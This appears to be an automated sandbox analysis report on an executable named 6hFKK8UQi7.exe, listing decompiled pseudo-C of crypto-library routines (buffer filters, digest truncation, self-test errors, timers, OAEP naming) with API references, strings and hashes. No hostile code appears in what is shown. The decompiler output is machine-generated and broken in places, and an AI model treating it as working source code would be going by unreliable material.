                    				_push(0xffffffff);
                    				_push(E01416A70);
                    				_push( *[fs:0x0]);
                    				_t41 =  *0x1435234; // 0x78d9f939
                    				_t42 = _t41 ^ _t96;
                    				_v20 = _t42;
                    				_push(_t42);
                    				 *[fs:0x0] =  &_v16;
                    				_t84 = __ecx;
                    				_t65 = __ecx + 0x20;
                    				_t82 = _a4;
                    				_push(_t65);
                    				_push(__ecx + 0x1c);
                    				_t89 = __ecx + 0x18;
                    				_push(_t89);
                    				_push(_a4);
                    				 *((intOrPtr*)( *__ecx + 0xcc))();
                    				_t46 =  *_t89;
                    				if( *_t89 == 0xffffffff ||  *((intOrPtr*)(__ecx + 0x1c)) < 1 ||  *_t65 == 0xffffffff) {
                    					_v64 = 0xf;
                    					_v68 = 0;
                    					_v84 = 0;
                    					E013C64B7( &_v84, __eflags, "FilterWithBufferedInput: invalid buffer size", 0x2c);
                    					asm("xorps xmm0, xmm0");
                    					_v8 = 0;
                    					asm("movq [ebp-0x34], xmm0");
                    					_v8 = 1;
                    					_t71 =  &_v44;
                    					_v60 = 0x141a7b8;
                    					_v48 = 1;
                    					_v24 = 0xf;
                    					_v28 = 0;
                    					_v44 = 0;
                    					E013C63D3(_t71, _t82,  &_v84, 0, 0xffffffff);
                    					_v8 = 0;
                    					_v60 = 0x141a97c;
                    					E013F4EC6( &_v60, 0x1430adc);
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					asm("int3");
                    					_t90 = _v140;
                    					_t85 = _t71;
                    					_t54 =  *((intOrPtr*)( *((intOrPtr*)( *_t90 + 4))))("PutMessage", 0x1435f5c,  &_v140, _t84, _t89);
                    					asm("sbb al, al");
                    					 *(_t85 + 0x30) =  ~_t54 & _v152;
                    					_t59 =  *((intOrPtr*)( *((intOrPtr*)( *_t90 + 4))))("TruncatedDigestSize", 0x1435f50,  &_v152);
                    					__eflags = _t59;
                    					if(_t59 == 0) {
                    						L6:
                    						_t61 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 + 0x2c)))) + 0x1c))();
                    					} else {
                    						_t61 = _v136;
                    						__eflags = _t61;
                    						if(_t61 < 0) {
                    							goto L6;
                    						}
                    					}
                    					 *((intOrPtr*)(_t85 + 0x34)) = _t61;
                    					return _t61;
                    				} else {
                    					_t62 = E013CFB50(__ecx + 0x28, 1, _t46);
                    					 *((char*)(__ecx + 0x24)) = 0;
                    					 *[fs:0x0] = _v16;
                    					return E013F268B(_t62, _v20 ^ _t94);
                    				}
                    			}






























                    0x013cf1a1
                    0x013cf1a3
                    0x013cf1a5
                    0x013cf1b0
                    0x013cf1b4
                    0x013cf1b9
                    0x013cf1bb
                    0x013cf1c1
                    0x013cf1c5
                    0x013cf1cb
                    0x013cf1cf
                    0x013cf1d2
                    0x013cf1d8
                    0x013cf1d9
                    0x013cf1da
                    0x013cf1df
                    0x013cf1e0
                    0x013cf1e1
                    0x013cf1e7
                    0x013cf1ec
                    0x013cf230
                    0x013cf237
                    0x013cf23e
                    0x013cf242
                    0x013cf247
                    0x013cf24a
                    0x013cf251
                    0x013cf25d
                    0x013cf262
                    0x013cf265
                    0x013cf26c
                    0x013cf273
                    0x013cf27a
                    0x013cf281
                    0x013cf285
                    0x013cf292
                    0x013cf297
                    0x013cf29e
                    0x013cf2a3
                    0x013cf2a4
                    0x013cf2a5
                    0x013cf2a6
                    0x013cf2a7
                    0x013cf2a8
                    0x013cf2a9
                    0x013cf2aa
                    0x013cf2ab
                    0x013cf2ac
                    0x013cf2ad
                    0x013cf2ae
                    0x013cf2af
                    0x013cf2b1
                    0x013cf2b6
                    0x013cf2ce
                    0x013cf2d7
                    0x013cf2df
                    0x013cf2f1
                    0x013cf2f3
                    0x013cf2f5
                    0x013cf2ff
                    0x013cf304
                    0x013cf2f7
                    0x013cf2f7
                    0x013cf2fb
                    0x013cf2fd
                    0x00000000
                    0x00000000
                    0x013cf2fd
                    0x013cf307
                    0x013cf30c
                    0x013cf1f9
                    0x013cf1ff
                    0x013cf204
                    0x013cf20b
                    0x013cf223
                    0x013cf223

                    APIs
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013CF29E
                    Strings
                    • TruncatedDigestSize, xrefs: 013CF2E9
                    • PutMessage, xrefs: 013CF2C6
                    • FilterWithBufferedInput: invalid buffer size, xrefs: 013CF228
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: Exception@8Throw
                    • String ID: FilterWithBufferedInput: invalid buffer size$PutMessage$TruncatedDigestSize
                    • API String ID: 2005118841-3547780871
                    • Opcode ID: 5a338e0246a842d1ae24edc091e457c842dd5b616603ca3d2122e17828e9fbe2
                    • Instruction ID: 97e55122a71873a160780f4a4705824097ffdc75efe50c7098d3784b6d77ddae
                    • Opcode Fuzzy Hash: 5a338e0246a842d1ae24edc091e457c842dd5b616603ca3d2122e17828e9fbe2
                    • Instruction Fuzzy Hash: E541B075A04249AFDB14CFA8D894FDEBBB9FF59724F10421EE415A7790C770A908CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 88%
                    			E01403602(void* __ecx, void* __edx, intOrPtr _a4) {
                    				signed int _v8;
                    				void* _v12;
                    				char _v16;
                    				intOrPtr* _t36;
                    				struct HINSTANCE__* _t37;
                    				struct HINSTANCE__* _t43;
                    				intOrPtr* _t44;
                    				intOrPtr* _t45;
                    				CHAR* _t49;
                    				struct HINSTANCE__* _t50;
                    				void* _t52;
                    				struct HINSTANCE__* _t55;
                    				intOrPtr* _t59;
                    				struct HINSTANCE__* _t64;
                    				intOrPtr _t65;
                    
                    				_t52 = __ecx;
                    				if(_a4 == 2 || _a4 == 1) {
                    					E0140D0F6(_t52);
                    					GetModuleFileNameA(0, 0x143a508, 0x104);
                    					_t49 =  *0x143a64c; // 0xae3390
                    					 *0x143a654 = 0x143a508;
                    					if(_t49 == 0 ||  *_t49 == 0) {
                    						_t49 = 0x143a508;
                    					}
                    					_v8 = 0;
                    					_v16 = 0;
                    					E01403726(_t52, _t49, 0, 0,  &_v8,  &_v16);
                    					_t64 = E0140389B(_v8, _v16, 1);
                    					if(_t64 != 0) {
                    						E01403726(_t52, _t49, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
                    						if(_a4 != 1) {
                    							_v12 = 0;
                    							_push( &_v12);
                    							_t50 = E0140CC11(_t64);
                    							if(_t50 == 0) {
                    								_t59 = _v12;
                    								_t55 = 0;
                    								_t36 = _t59;
                    								if( *_t59 == 0) {
                    									L15:
                    									_t37 = 0;
                    									 *0x143a640 = _t55;
                    									_v12 = 0;
                    									_t50 = 0;
                    									 *0x143a644 = _t59;
                    									L16:
                    									E014012E1(_t37);
                    									_v12 = 0;
                    									goto L17;
                    								} else {
                    									goto L14;
                    								}
                    								do {
                    									L14:
                    									_t36 = _t36 + 4;
                    									_t55 =  &(_t55->i);
                    								} while ( *_t36 != 0);
                    								goto L15;
                    							}
                    							_t37 = _v12;
                    							goto L16;
                    						}
                    						 *0x143a640 = _v8 - 1;
                    						_t43 = _t64;
                    						_t64 = 0;
                    						 *0x143a644 = _t43;
                    						goto L10;
                    					} else {
                    						_t44 = E013FDB3A();
                    						_push(0xc);
                    						_pop(0);
                    						 *_t44 = 0;
                    						L10:
                    						_t50 = 0;
                    						L17:
                    						E014012E1(_t64);
                    						return _t50;
                    					}
                    				} else {
                    					_t45 = E013FDB3A();
                    					_t65 = 0x16;
                    					 *_t45 = _t65;
                    					E013FDA61();
                    					return _t65;
                    				}
                    			}


















                    0x01403602
                    0x0140360f
                    0x0140362f
                    0x01403642
                    0x01403648
                    0x0140364e
                    0x01403656
                    0x0140365d
                    0x0140365d
                    0x01403662
                    0x01403669
                    0x01403670
                    0x01403682
                    0x01403689
                    0x014036a8
                    0x014036b4
                    0x014036cf
                    0x014036d2
                    0x014036d9
                    0x014036df
                    0x014036e6
                    0x014036e9
                    0x014036eb
                    0x014036ef
                    0x014036f9
                    0x014036f9
                    0x014036fb
                    0x01403701
                    0x01403704
                    0x01403706
                    0x0140370c
                    0x0140370d
                    0x01403713
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x014036f1
                    0x014036f1
                    0x014036f1
                    0x014036f4
                    0x014036f5
                    0x00000000
                    0x014036f1
                    0x014036e1
                    0x00000000
                    0x014036e1
                    0x014036ba
                    0x014036bf
                    0x014036c1
                    0x014036c3
                    0x00000000
                    0x0140368b
                    0x0140368b
                    0x01403690
                    0x01403692
                    0x01403693
                    0x014036c8
                    0x014036c8
                    0x01403716
                    0x01403717
                    0x00000000
                    0x01403720
                    0x01403617
                    0x01403617
                    0x0140361e
                    0x0140361f
                    0x01403621
                    0x00000000
                    0x01403626

                    APIs
                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\6hFKK8UQi7.exe,00000104), ref: 01403642
                    • _free.LIBCMT ref: 0140370D
                    • _free.LIBCMT ref: 01403717
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: _free$FileModuleName
                    • String ID: C:\Users\user\Desktop\6hFKK8UQi7.exe
                    • API String ID: 2506810119-3980468673
                    • Opcode ID: 39e2024f4f8028d6e46c8afc35a8e4897423c1441d41f89fe6d8d030cdd024b2
                    • Instruction ID: 4bf8b0e8e55437da76c19cb3252087d71cc61e6505688a45c9e29a52cf878a4e
                    • Opcode Fuzzy Hash: 39e2024f4f8028d6e46c8afc35a8e4897423c1441d41f89fe6d8d030cdd024b2
                    • Instruction Fuzzy Hash: 9F3165B1904215EFDB32DF9ADC8499EBFE8FBA5710F20407BE94897360D6708A419B50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 76%
                    			E013CD180(void* __ebx, intOrPtr* __ecx, intOrPtr _a4) {
                    				char _v8;
                    				char _v16;
                    				signed int _v20;
                    				intOrPtr _v24;
                    				char _v28;
                    				char _v44;
                    				intOrPtr _v48;
                    				char _v60;
                    				char _v84;
                    				char _v108;
                    				char _v132;
                    				char _v156;
                    				char _v180;
                    				char _v204;
                    				void* __edi;
                    				void* __ebp;
                    				signed int _t30;
                    				signed int _t31;
                    				void* _t37;
                    				void* _t42;
                    				void* _t44;
                    				void* _t46;
                    				void* _t48;
                    				intOrPtr* _t61;
                    				signed int _t67;
                    
                    				_push(0xffffffff);
                    				_push(E01416891);
                    				_push( *[fs:0x0]);
                    				_t30 =  *0x1435234; // 0x78d9f939
                    				_t31 = _t30 ^ _t67;
                    				_v20 = _t31;
                    				_push(_t31);
                    				 *[fs:0x0] =  &_v16;
                    				_t61 = __ecx;
                    				_t64 = _a4;
                    				if(_a4 >  *((intOrPtr*)( *__ecx + 0x1c))()) {
                    					_t37 = E013E9DA0( &_v84, _t64, 0xa);
                    					_t59 =  *_t61;
                    					_v8 = 0;
                    					_push(E013E9DA0( &_v108,  *((intOrPtr*)( *_t61 + 0x1c))(), 0xa));
                    					_v8 = 1;
                    					_t42 = E013CAD00(_t61,  &_v132, "HashTransformation: can\'t truncate a ");
                    					_v8 = 2;
                    					_t44 = E013C1DF7(__ebx, _t61,  *_t61,  &_v156, _t42, " byte digest to ");
                    					_v8 = 3;
                    					_t46 = E013C1DA9(__ebx, _t61, _t61,  &_v180, _t44, _t37);
                    					_v8 = 4;
                    					_t48 = E013C1DF7(__ebx, _t61,  *_t61,  &_v204, _t46, " bytes");
                    					asm("xorps xmm0, xmm0");
                    					asm("movq [ebp-0x34], xmm0");
                    					_v8 = 6;
                    					_v60 = 0x141a7b8;
                    					_v48 = 1;
                    					_v24 = 0xf;
                    					_v28 = 0;
                    					_v44 = 0;
                    					E013C63D3( &_v44, _t59, _t48, 0, 0xffffffff);
                    					_v8 = 5;
                    					_v60 = 0x141a97c;
                    					_t34 = E013F4EC6( &_v60, 0x1430adc);
                    				}
                    				 *[fs:0x0] = _v16;
                    				return E013F268B(_t34, _v20 ^ _t67);
                    			}




























                    0x013cd183
                    0x013cd185
                    0x013cd190
                    0x013cd197
                    0x013cd19c
                    0x013cd19e
                    0x013cd1a3
                    0x013cd1a7
                    0x013cd1ad
                    0x013cd1b1
                    0x013cd1b9
                    0x013cd1c6
                    0x013cd1d0
                    0x013cd1d6
                    0x013cd1ea
                    0x013cd1ee
                    0x013cd1f8
                    0x013cd209
                    0x013cd20e
                    0x013cd21b
                    0x013cd220
                    0x013cd231
                    0x013cd236
                    0x013cd23e
                    0x013cd241
                    0x013cd24e
                    0x013cd252
                    0x013cd259
                    0x013cd260
                    0x013cd267
                    0x013cd26e
                    0x013cd272
                    0x013cd27f
                    0x013cd284
                    0x013cd28b
                    0x013cd28b
                    0x013cd293
                    0x013cd2aa

                    APIs
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013CD28B
                      • Part of subcall function 013F4EC6: RaiseException.KERNEL32(?,?,013F0FA0,00000010,00000010,?,?,?,?,?,?,013F0FA0,00000010,01433568,?,00000010), ref: 013F4F25
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: ExceptionException@8RaiseThrow
                    • String ID: byte digest to $ bytes$HashTransformation: can't truncate a
                    • API String ID: 3976011213-1139078987
                    • Opcode ID: 946b0524c116691909c87279aa37ca4b05f80c015998b7ed0a5f73a8e80e611f
                    • Instruction ID: 530494d48f87d4d2335150f295bc45f1557350cc34e7c8939d214385acb8bdcb
                    • Opcode Fuzzy Hash: 946b0524c116691909c87279aa37ca4b05f80c015998b7ed0a5f73a8e80e611f
                    • Instruction Fuzzy Hash: 0631C271D00359EADB11DBA8CC48FDFBBB8AF15728F20425AE404B7380DBB55A448BA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 77%
                    			E013CB0B0(void* __ecx, char _a4) {
                    				intOrPtr _v8;
                    				char _v16;
                    				signed int _v20;
                    				char _v44;
                    				char _v68;
                    				char _v108;
                    				char _v148;
                    				void* __ebp;
                    				signed int _t17;
                    				signed int _t18;
                    				void* _t46;
                    				signed int _t48;
                    
                    				_push(0xffffffff);
                    				_push(E01416300);
                    				_push( *[fs:0x0]);
                    				_t17 =  *0x1435234; // 0x78d9f939
                    				_t18 = _t17 ^ _t48;
                    				_v20 = _t18;
                    				_push(_t18);
                    				 *[fs:0x0] =  &_v16;
                    				_t46 = __ecx;
                    				if(_a4 != 0 && E013C4DA0() != 0) {
                    					if(E013ED600() == 0 && E013C4DA0() == 0) {
                    						E013C2AD0( &_v44, "Cryptographic algorithms are disabled before the power-up self tests are performed.");
                    						_v8 = 0;
                    						E013CB650( &_v44);
                    						E013F4EC6( &_v108, 0x1431588);
                    					}
                    					if(E013ED600() == 1) {
                    						E013C2AD0( &_v68, "Cryptographic algorithms are disabled after a power-up self test failed.");
                    						_v8 = 1;
                    						E013CB650( &_v68);
                    						E013F4EC6( &_v148, 0x1431588);
                    					}
                    				}
                    				 *[fs:0x0] = _v16;
                    				return E013F268B(_t46, _v20 ^ _t48);
                    			}















                    0x013cb0b3
                    0x013cb0b5
                    0x013cb0c0
                    0x013cb0c7
                    0x013cb0cc
                    0x013cb0ce
                    0x013cb0d2
                    0x013cb0d6
                    0x013cb0dc
                    0x013cb0e2
                    0x013cb0f8
                    0x013cb10b
                    0x013cb113
                    0x013cb11e
                    0x013cb12c
                    0x013cb12c
                    0x013cb139
                    0x013cb143
                    0x013cb14b
                    0x013cb159
                    0x013cb16a
                    0x013cb16a
                    0x013cb139
                    0x013cb174
                    0x013cb18a

                    APIs
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013CB12C
                      • Part of subcall function 013F4EC6: RaiseException.KERNEL32(?,?,013F0FA0,00000010,00000010,?,?,?,?,?,?,013F0FA0,00000010,01433568,?,00000010), ref: 013F4F25
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013CB16A
                    Strings
                    • Cryptographic algorithms are disabled before the power-up self tests are performed., xrefs: 013CB103
                    • Cryptographic algorithms are disabled after a power-up self test failed., xrefs: 013CB13B
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: Exception@8Throw$ExceptionRaise
                    • String ID: Cryptographic algorithms are disabled after a power-up self test failed.$Cryptographic algorithms are disabled before the power-up self tests are performed.
                    • API String ID: 3476068407-3345525433
                    • Opcode ID: e811a2525d444ed7a7c79e5ea2ad78cc58e66bb71d73f3306e66e19d14e8abd5
                    • Instruction ID: a657dc11dc4f3000881b32092d26f357e682760287bfe61bc54436052e8ca0af
                    • Opcode Fuzzy Hash: e811a2525d444ed7a7c79e5ea2ad78cc58e66bb71d73f3306e66e19d14e8abd5
                    • Instruction Fuzzy Hash: 9A2193719102199ADF21EFACCD45BDEF7BCEF14A68F40056EE906A3294EF70A904CB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 68%
                    			E013EA7A0(void* __edx, void* __edi) {
                    				struct %anon52 _v8;
                    				char _v16;
                    				signed int _v20;
                    				struct %anon52 _v28;
                    				char _v44;
                    				intOrPtr _v48;
                    				char _v60;
                    				char _v84;
                    				struct %anon52 _v112;
                    				union _LARGE_INTEGER _v116;
                    				void* __ebp;
                    				signed int _t23;
                    				signed int _t24;
                    				void* _t34;
                    				void* _t43;
                    				signed int _t46;
                    
                    				_t43 = __edx;
                    				_push(0xffffffff);
                    				_push(E01417DD8);
                    				_push( *[fs:0x0]);
                    				_t23 =  *0x1435234; // 0x78d9f939
                    				_t24 = _t23 ^ _t46;
                    				_v20 = _t24;
                    				_push(_t24);
                    				 *[fs:0x0] =  &_v16;
                    				_v116.LowPart = 0;
                    				_v112 = 0;
                    				if(QueryPerformanceCounter( &_v116) == 0) {
                    					_push(E013E9DA0( &_v84, GetLastError(), 0xa));
                    					_v8.LowPart = 0;
                    					_t34 = E013CAD00(__edi,  &(_v112.HighPart), "Timer: QueryPerformanceCounter failed with error ");
                    					asm("xorps xmm0, xmm0");
                    					asm("movq [ebp-0x34], xmm0");
                    					_v8.LowPart = 2;
                    					_v60 = 0x141a7b8;
                    					_v48 = 6;
                    					_v28.HighPart = 0xf;
                    					_v28 = 0;
                    					_v44 = 0;
                    					E013C63D3( &_v44, _t43, _t34, 0, 0xffffffff);
                    					_v8 = 1;
                    					E013F4EC6( &_v60, 0x14327ec);
                    				}
                    				 *[fs:0x0] = _v16;
                    				return E013F268B(_v116.LowPart, _v20 ^ _t46);
                    			}



















                    0x013ea7a0
                    0x013ea7a3
                    0x013ea7a5
                    0x013ea7b0
                    0x013ea7b4
                    0x013ea7b9
                    0x013ea7bb
                    0x013ea7be
                    0x013ea7c2
                    0x013ea7cb
                    0x013ea7d3
                    0x013ea7e2
                    0x013ea7f6
                    0x013ea7fa
                    0x013ea807
                    0x013ea80f
                    0x013ea812
                    0x013ea81f
                    0x013ea823
                    0x013ea82a
                    0x013ea831
                    0x013ea838
                    0x013ea83f
                    0x013ea843
                    0x013ea850
                    0x013ea855
                    0x013ea855
                    0x013ea863
                    0x013ea878

                    APIs
                    • QueryPerformanceCounter.KERNEL32(?), ref: 013EA7DA
                    • GetLastError.KERNEL32(0000000A), ref: 013EA7E6
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013EA855
                      • Part of subcall function 013F4EC6: RaiseException.KERNEL32(?,?,013F0FA0,00000010,00000010,?,?,?,?,?,?,013F0FA0,00000010,01433568,?,00000010), ref: 013F4F25
                    Strings
                    • Timer: QueryPerformanceCounter failed with error , xrefs: 013EA801
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: CounterErrorExceptionException@8LastPerformanceQueryRaiseThrow
                    • String ID: Timer: QueryPerformanceCounter failed with error
                    • API String ID: 3328791911-4075696077
                    • Opcode ID: ec37ffc3ae13ee7c91d8af8e720d903c752a5f33e782a3c5a75aa6c970bed239
                    • Instruction ID: 49bbac1f06d5919b389bf333802c3d64282f6f33f7d41b45f1cb58773a0508ea
                    • Opcode Fuzzy Hash: ec37ffc3ae13ee7c91d8af8e720d903c752a5f33e782a3c5a75aa6c970bed239
                    • Instruction Fuzzy Hash: 7C2149B1D04349EBDB11DFA4C949BDEBBB8AB19718F20421AE815B7281DBB856048B90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 68%
                    			E013EA880(void* __edx, void* __edi) {
                    				struct %anon52 _v8;
                    				char _v16;
                    				signed int _v20;
                    				struct %anon52 _v28;
                    				char _v44;
                    				intOrPtr _v48;
                    				char _v60;
                    				char _v84;
                    				struct %anon52 _v112;
                    				union _LARGE_INTEGER _v116;
                    				void* __ebp;
                    				signed int _t23;
                    				signed int _t24;
                    				void* _t34;
                    				void* _t43;
                    				signed int _t46;
                    
                    				_t43 = __edx;
                    				_push(0xffffffff);
                    				_push(E01417DD8);
                    				_push( *[fs:0x0]);
                    				_t23 =  *0x1435234; // 0x78d9f939
                    				_t24 = _t23 ^ _t46;
                    				_v20 = _t24;
                    				_push(_t24);
                    				 *[fs:0x0] =  &_v16;
                    				_v116.LowPart = 0;
                    				_v112 = 0;
                    				if(QueryPerformanceFrequency( &_v116) == 0) {
                    					_push(E013E9DA0( &_v84, GetLastError(), 0xa));
                    					_v8.LowPart = 0;
                    					_t34 = E013CAD00(__edi,  &(_v112.HighPart), "Timer: QueryPerformanceFrequency failed with error ");
                    					asm("xorps xmm0, xmm0");
                    					asm("movq [ebp-0x34], xmm0");
                    					_v8.LowPart = 2;
                    					_v60 = 0x141a7b8;
                    					_v48 = 6;
                    					_v28.HighPart = 0xf;
                    					_v28 = 0;
                    					_v44 = 0;
                    					E013C63D3( &_v44, _t43, _t34, 0, 0xffffffff);
                    					_v8 = 1;
                    					E013F4EC6( &_v60, 0x14327ec);
                    				}
                    				 *[fs:0x0] = _v16;
                    				return E013F268B(_v116.LowPart, _v20 ^ _t46);
                    			}



















                    0x013ea880
                    0x013ea883
                    0x013ea885
                    0x013ea890
                    0x013ea894
                    0x013ea899
                    0x013ea89b
                    0x013ea89e
                    0x013ea8a2
                    0x013ea8ab
                    0x013ea8b3
                    0x013ea8c2
                    0x013ea8d6
                    0x013ea8da
                    0x013ea8e7
                    0x013ea8ef
                    0x013ea8f2
                    0x013ea8ff
                    0x013ea903
                    0x013ea90a
                    0x013ea911
                    0x013ea918
                    0x013ea91f
                    0x013ea923
                    0x013ea930
                    0x013ea935
                    0x013ea935
                    0x013ea943
                    0x013ea958

                    APIs
                    • QueryPerformanceFrequency.KERNEL32(?), ref: 013EA8BA
                    • GetLastError.KERNEL32(0000000A), ref: 013EA8C6
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013EA935
                      • Part of subcall function 013F4EC6: RaiseException.KERNEL32(?,?,013F0FA0,00000010,00000010,?,?,?,?,?,?,013F0FA0,00000010,01433568,?,00000010), ref: 013F4F25
                    Strings
                    • Timer: QueryPerformanceFrequency failed with error , xrefs: 013EA8E1
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: ErrorExceptionException@8FrequencyLastPerformanceQueryRaiseThrow
                    • String ID: Timer: QueryPerformanceFrequency failed with error
                    • API String ID: 1209282935-348333943
                    • Opcode ID: a890b17f7fa56c077c447d050d0461077730994da62fa090f19e35e5a5764377
                    • Instruction ID: 30e13e12522248e84a36e9e2504fd4176712590ca333963be06770553b6d6956
                    • Opcode Fuzzy Hash: a890b17f7fa56c077c447d050d0461077730994da62fa090f19e35e5a5764377
                    • Instruction Fuzzy Hash: 36218BB1D0434DEBCB11DFE4C848BDEBBB8BB19718F20421AE415B7280DBB466048B90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 93%
                    			E013C554F(void* __ebx, void* __edx) {
                    				void* _t18;
                    				void* _t20;
                    				void* _t22;
                    				void* _t24;
                    				void* _t38;
                    				void* _t40;
                    
                    				_t38 = __edx;
                    				_t32 = __ebx;
                    				_push(0x64);
                    				E013F26C2(E01415BC4);
                    				_t33 = _t40 - 0x70;
                    				 *((intOrPtr*)(_t40 - 0x10)) = 0;
                    				_t18 = E013C2AD0(_t40 - 0x70, "OAEP-");
                    				 *((intOrPtr*)(_t40 - 4)) = 0;
                    				_t20 = E013C1DF7(__ebx, _t40 - 0x70, _t38, _t40 - 0x58, _t18, "MGF1");
                    				 *((char*)(_t40 - 4)) = 1;
                    				_t22 = E013C1DF7(__ebx, _t33, _t38, _t40 - 0x40, _t20, "(");
                    				 *((char*)(_t40 - 4)) = 2;
                    				_t24 = E013C1DF7(_t32, _t33, _t38, _t40 - 0x28, _t22, "SHA-1");
                    				 *((char*)(_t40 - 4)) = 3;
                    				E013C1DF7(_t32, _t33, _t38,  *((intOrPtr*)(_t40 + 8)), _t24, ")");
                    				E013C6118(_t40 - 0x28, 1, 0);
                    				E013C6118(_t40 - 0x40, 1, 0);
                    				E013C6118(_t40 - 0x58, 1, 0);
                    				E013C6118(_t40 - 0x70, 1, 0);
                    				return E013F269C( *((intOrPtr*)(_t40 + 8)));
                    			}









                    0x013c554f
                    0x013c554f
                    0x013c554f
                    0x013c5556
                    0x013c555d
                    0x013c5565
                    0x013c5568
                    0x013c5576
                    0x013c557a
                    0x013c5588
                    0x013c558d
                    0x013c559b
                    0x013c55a0
                    0x013c55ae
                    0x013c55b2
                    0x013c55c0
                    0x013c55cb
                    0x013c55d6
                    0x013c55e1
                    0x013c55ee

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
